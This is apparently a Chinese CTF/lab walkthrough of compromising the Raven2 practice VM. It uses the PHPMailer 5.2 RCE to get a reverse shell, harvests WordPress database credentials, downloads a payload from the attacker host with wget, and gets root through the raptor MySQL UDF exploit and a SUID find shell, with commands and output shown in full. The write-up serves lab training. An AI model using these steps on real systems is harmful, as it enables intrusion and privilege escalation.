记一次 Raven2 渗透(phpmailer漏洞+UDF提权)
目录:
1. 寻找IP
2.dirb目录爆破
2.PHPMailer漏洞反弹得到shell
3.python版本的exp修改
4.查看wordpress的wp-config.php配置文件得到数据库账号和密码
5.使用LinEnum.sh对linux进行信息收集
6.mysqlUDF提权,kali对EXP的编译
7.给程序chmod u+s 增加suid权限,可以以root来运行
8.利用带有suid标志的find命令进行命令执行拿到root权限
0x01 寻找IP
安装好了我们的靶机,当然我们不知道账号密码,也不知道当前的ip ,一开始当然先寻找IP咯
使用命令:
nmap -sn 192.168.48.1/24
起始的IP是 1,而我们kali的ip是157 , 254是结束ip ,156应该就是我们靶机的ip了,扫下开了什么端口呢,-sS只扫描了1000以内的端口,这边我们就直接用-p-参数了,看到有22,80,111,39934端口,
先看下80端口,发现没啥好利用的东西
0x02 目录扫描
这边我们使用到了dirb目录扫描,扫出来很多了目录,找了半天才找到这个vendor,嘤嘤嘤~
在/vendor/PATH路劲下我们发现了第一枚flag
还有一个README.MD,发现有一个PHPmailer,百度了一下是一个发送邮件类,版本是5.2
还发现了了个version,但是不知道是哪个软件的
这边百度了一下,发现存在phpmailer远程命令执行漏洞 ,这边直接用kali自带的searchploit,并且将其复制到我们的根目录下
复制到了根目录,我们要修改下exp,下图中红框标注的是修改的地方
在开头加上这些东西,否则注释里一大堆非ASCII字符会报错
修改target为靶机IP地址,利用文件为contact.php,生成的后门文件为bb.php
修改成你的攻击机的ip和监听的端口
修改成后门文件的绝对路径
这时候我们执行exp
pyhthon3 40974.py
这个时候访问contact.php,就会生成我们的后门文件bb.php,然后我们就kali监听我们的4444端口(exp设置的是4444端口),先监听再去访问哦~
用python切换到交互shell,,我这儿没用,因为不知道为什么是双字母了,后面还是太年轻了, (nc模式下的shell不支持su交互,还是得先利用python提升到伪终端)
python -c 'import pty;pty.spawn("/bin/bash")'
一猜当前肯定只是www权限,果不其然。而且当前目录是/var/www/html目录下
我们cd上个目录,发现了flag2.txt
,
而且在 /var/www/ 目录下,看到了有个wordpress目录,而且目录下有配置文件config.php,一看直接受不了了,mysql数据库的账号密码直接看到了
题目提示的是有3个flag,看来是要提权了,这边直接在我的kali上安装一个LinEnum.sh是对LINUX进行信息收集,方便提权使用,项目地址:https://github.com/rebootuser/LinEnum ,复制到本地服务器上进行编译,在传到目标机上,
、
在目标机用wget下载就好啦,不知道python交互的时候怎么回事,字母都是双写,一直解决不了,很烦!(ps:后面采用xshell 连接kali,成功解决,图就难的改了 哈哈)
收集到mysql 是root权限,试试udf提权呢。
连接上了数据库,查看版本,看到版本是5.5.60是可以udf提权的哈,这边也是用kali先下载编译好exp,不过有个小坑,我kali使用wget下载的时候编译文件一直报错,没办法 我就只好采用手动复制的方法去将exp复制下来,exp网址:https://www.exploit-db/download/1518
当我们复制好了代码,新建一个名字为raptor_udf.c的文件,将exp复制进去。然后编译
gcc -g -c raptor_udf.c gcc -g -shared -o raptor_udf.so raptor_udf.o -lc
然后将raptor_udf2.so 复制到本地网站服务器上,
靶机去下载
cd /tmp
wget http://192.168.48.157/raptor.udf.so
接着就去mysql敲命令就行了
mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.08 sec)
mysql> insert into foo values(load_file('/tmp/raptor_udf.so'));
insert into foo values(load_file('/tmp/raptor_udf.so'));
Query OK, 1 row affected (0.01 sec)
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so';
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so';
Query OK, 1 row affected (0.11 sec)
mysql> create function do_system returns integer soname 'raptor_udf.so';
create function do_system returns integer soname 'raptor_udf.so';
Query OK, 0 rows affected (0.00 sec)
mysql> select * from mysql.func;
select * from mysql.func;
+-----------+-----+---------------+----------+
| name | ret | dl | type |
+-----------+-----+---------------+----------+
| do_system | 2 | raptor_udf.so | function |
+-----------+-----+---------------+----------+
row in set (0.00 sec)
mysql> select do_system('chmod u+s /usr/bin/find');
select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
| 0 |
+--------------------------------------+
row in set (0.01 sec)
mysql> exit
exit
Bye
www-data@Raven:/tmp$ touch finn
touch finn
www-data@Raven:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Raven:/tmp$ find finn -exec "/bin/sh" \;
find finn -exec "/bin/sh" \;
# whoami
whoami
root
#
最后看到我们提权成功了啊,做了一下午 舒服啊~
成功得到最后一个flag
